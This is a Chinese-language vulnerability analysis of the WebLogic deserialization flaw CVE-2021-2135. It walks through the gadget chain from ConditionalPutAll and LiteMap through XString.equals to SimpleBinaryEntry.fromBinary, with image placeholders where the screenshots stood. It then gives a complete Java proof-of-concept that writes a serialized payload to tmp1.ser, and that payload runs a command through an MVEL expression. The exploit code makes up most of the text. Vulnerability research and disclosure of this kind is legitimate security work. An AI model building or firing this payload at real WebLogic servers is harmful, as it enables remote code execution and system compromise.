
Weblogic反序列化漏洞分析(CVE-2021-2135)

Weblogic反序列化漏洞分析(CVE-2021-2135)

先看 com.tangosol.util.ExternalizableHelper 类,其中的 toBinary / fromBinary 方法可以把任意对象序列化成 Binary 并从 Binary 反序列化重建,fromBinary 在这里可以作为 sink:
image

接下来就是寻找利用链,即寻找调用了这个 fromBinary 方法的地方,这里找到了 com.tangosol.internal.util.SimpleBinaryEntry:
image

这里的 getKey / getValue 方法都用到了 fromBinary;此外,toString 方法也调用了 getKey / getValue,从而间接使用了 fromBinary。
image

这里的 toString 方法非常熟悉了,本来可以直接接上 BadAttributeValueExpException.readObject() 这条利用链,但是观察到 m_key / m_value 字段是用 transient 修饰的,默认的 Java 反序列化不会恢复 transient 字段,所以无法通过 readObject 直接给这两个字段赋值。

所以需要半自动化的寻找,最后作者找到了 ConditionalPutAll 的利用链,
image

接着看 ConditionalPutAll 的 readExternal 方法,它调用了 ExternalizableHelper.readMap:
image

跟进发现调用了 map.put:
image

这里的 map 可以是上面的 LiteMap,当 this.m_nImpl 取数组实现对应的值时(图中以 2 为例;下面的 POC 因为 m_oContents 里放了两个 entry 而把它设为 3,推测两者属于同一类分支,实际值需对照目标版本的 LiteMap 确认),会调用 Base.equals:
image

继续跟进 Base.equals:
image

由于 Base.equals 的两个参数(LiteMap 中已有 entry 的 key 和新 put 进来的 key)都来自反序列化数据、攻击者可控,所以可以让它走到 XString.equals:
image

XString.equals 最终会执行到传入对象的 toString 方法,于是触发 SimpleBinaryEntry.toString → getKey → fromBinary,整个链就走通了。

POC

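/**
 * Builds the CVE-2021-2135 gadget chain walked through above and writes it to
 * {@code tmp1.ser} as a Java-serialized {@code AttributeHolder}.
 *
 * Chain, outer to inner: AttributeHolder.m_oValue -> ConditionalPutAll.m_map
 * -> LiteMap (two-entry contents array) -> put() -> Base.equals -> XString.equals
 * -> SimpleBinaryEntry.toString -> getKey -> ExternalizableHelper.fromBinary,
 * which rebuilds a TopNAggregator.PartialResult whose TreeMap comparator is an
 * MvelExtractor carrying the command. Presumably the MVEL expression runs when
 * the rebuilt TreeMap invokes that comparator; confirm against the target build.
 *
 * Proof of concept only: the payload executes a command on the target. Use it
 * solely against systems you are authorized to test.
 *
 * @param args unused
 * @throws Exception on any reflection or I/O failure
 */
public static void main(String[] args) throws Exception {
    // Innermost gadget: the MVEL expression evaluated via the comparator.
    MvelExtractor extractor = new MvelExtractor("Runtime.getRuntime().exec(\"calc\");");

    // PartialResult is backed by SortedBag.m_map; swap in a TreeMap with one
    // element so the comparator is exercised when the bag is rebuilt.
    TopNAggregator.PartialResult partialResult =
            new TopNAggregator.PartialResult((Comparator) extractor, 1);
    NavigableMap<Object, Object> backing = new TreeMap<>();
    backing.put("1", "1");
    Field mapField = SortedBag.class.getDeclaredField("m_map");
    mapField.setAccessible(true);
    mapField.set(partialResult, backing);

    // Serialize the PartialResult into the Binary that fromBinary will rebuild
    // once SimpleBinaryEntry.getKey() is reached through toString().
    Binary binaryKey = ExternalizableHelper.toBinary(partialResult);
    Binary binaryValue = new Binary();
    SimpleBinaryEntry simpleBinaryEntry = new SimpleBinaryEntry(binaryKey, binaryValue);

    // LiteMap with two entries: the SimpleBinaryEntry whose toString() we want,
    // and an XString whose equals() reaches toString() on the other key.
    // m_nImpl = 3 is the implementation index used here for a two-entry
    // contents array (the write-up shows the equals() path for this family);
    // verify the exact constant against the target's LiteMap.
    LiteMap liteMap = new LiteMap();
    setFieldValue(liteMap, "m_nImpl", (byte) 3);

    Map.Entry[] contents = new Map.Entry[8];
    contents[0] = new AbstractMap.SimpleEntry<>(simpleBinaryEntry, "aaa");
    contents[1] = new AbstractMap.SimpleEntry<>(new XString("1"), "bbb");
    setFieldValue(liteMap, "m_oContents", contents);

    // ConditionalPutAll.readExternal -> ExternalizableHelper.readMap -> map.put(...)
    ConditionalPutAll conditionalPutAll = new ConditionalPutAll();
    setFieldValue(conditionalPutAll, "m_map", liteMap);

    // Outer Serializable wrapper; its m_oValue is presumably what gets handed to
    // ConditionalPutAll.readExternal on the target -- confirm if the chain stalls.
    AttributeHolder attributeHolder = new AttributeHolder();
    setFieldValue(attributeHolder, "m_oValue", conditionalPutAll);

    // Write the payload; try-with-resources closes the stream even if
    // writeObject throws (the original leaked it on failure).
    File payload = new File("tmp1.ser");
    try (ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(payload))) {
        out.writeObject(attributeHolder);
    }
}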

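/**
 * Reflectively stores {@code value} into the field named {@code fieldName} of
 * {@code obj}, locating the field anywhere in the class hierarchy via
 * {@link #getField}.
 *
 * @param obj       target instance
 * @param fieldName name of the (possibly private or inherited) field
 * @param value     value to store; a boxed primitive is unboxed by {@link Field#set}
 * @throws NoSuchFieldException if no class in the hierarchy declares the field
 *                              (previously this surfaced as a bare NullPointerException)
 * @throws Exception            if the reflective assignment itself fails
 */
public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
    Field field = getField(obj.getClass(), fieldName);
    if (field == null) {
        throw new NoSuchFieldException(
                fieldName + " not declared by " + obj.getClass().getName() + " or any superclass");
    }
    field.set(obj, value);
}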

/**
 * Finds a declared field by name, starting at {@code clazz} and climbing the
 * superclass chain; the field is made accessible before being returned.
 *
 * @param clazz     class to start the search from
 * @param fieldName name of the declared field
 * @return the accessible {@link Field}, or {@code null} if no class in the
 *         chain declares a field with that name
 */
public static Field getField(Class<?> clazz, String fieldName) {
    Class<?> current = clazz;
    do {
        try {
            Field found = current.getDeclaredField(fieldName);
            found.setAccessible(true);
            return found;
        } catch (NoSuchFieldException notDeclaredHere) {
            // not on this class; continue with the parent, if any
            current = current.getSuperclass();
        }
    } while (current != null);
    return null;
}

/**
 * Encodes an int as four big-endian bytes (most significant byte first).
 *
 * @param i value to encode
 * @return a new 4-byte array; {@code result[0]} holds bits 31..24 and
 *         {@code result[3]} bits 7..0
 */
public static byte[] intToByteArray(int i) {
    byte[] encoded = new byte[4];
    int remaining = i;
    // Fill from the least significant byte upward; the narrowing cast keeps
    // exactly the low 8 bits, matching "& 0xFF" on the shifted value.
    for (int idx = 3; idx >= 0; idx--) {
        encoded[idx] = (byte) remaining;
        remaining >>>= 8;
    }
    return encoded;
}

image